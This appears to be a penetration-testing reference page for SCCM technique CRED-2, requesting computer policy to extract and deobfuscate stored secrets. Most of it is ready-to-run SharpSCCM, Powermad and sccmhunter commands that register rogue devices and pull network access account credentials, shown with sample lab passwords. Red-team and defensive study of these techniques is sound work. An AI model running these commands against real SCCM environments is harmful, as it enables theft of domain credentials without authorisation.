CRED-2 - Policy Request Credentials
Document Reference
Description
Request computer policy and deobfuscate secrets
Requirements
PKI certificates are not required for client authentication
Additionally, any of the below requirements can be met to perform this attack.
Domain Computer credentials
The ability to create computer objects (MachineAccountQuota)
Local administrator on a SCCM client
Windows
Local Administrator on SCCM Client
If you are a local administrator or running as SYSTEM on a SCCM client. We can simply request the computer policy without specifying any credentials
SharpSCCM.exe get secrets
Using Domain Computer Credentials
If we have a password for a domain computer account we can use this directly with SharpSCCM to register a new device
SharpSCCM.exe get secrets -r EvilDevice -u mecm$ -p 'I(A*r@KqUuoj5oHFO=<--Snip>-->'
Machine Account Quota
Create new machine account with Powermad
New-MachineAccount -MachineAccount EvilSCCM$ -Domain sccm.lab -DomainController 192.168.60.10
Use SharpSCCM to request policy for the new account
# get secrets is preferred over naa due to secrets potentially containing further
# credentials from task sequences and collection varaibles
SharpSCCM.exe get secrets -r newdevice -u EvilSCCM$ -p Evil123
SharpSCCM.exe get naa -r newdevice -u EvilSCCM$ -p Evil123

Linux
SCCMhunter
# auto, requires user credentials and MachineAccountQuota greater than 0
python3 sccmhunter.py http -u standard-user -p 'Password1!' -d sccm.lab -dc-ip 192.168.60.10 -auto -sleep 30
# Manual, requires user credentials and computer account credentials
python3 sccmhunter.py http -u standard-user -p 'Password1!' -d sccm.lab -dc-ip 192.168.60.10 -cn 'EvilRiley$' -cp Evil123 -sleep 30

This will create a device object within SCCM. Ensure that when on an engagement, the client is informed and request for it to be deleted once completed.

- Defensive IDs
Last updated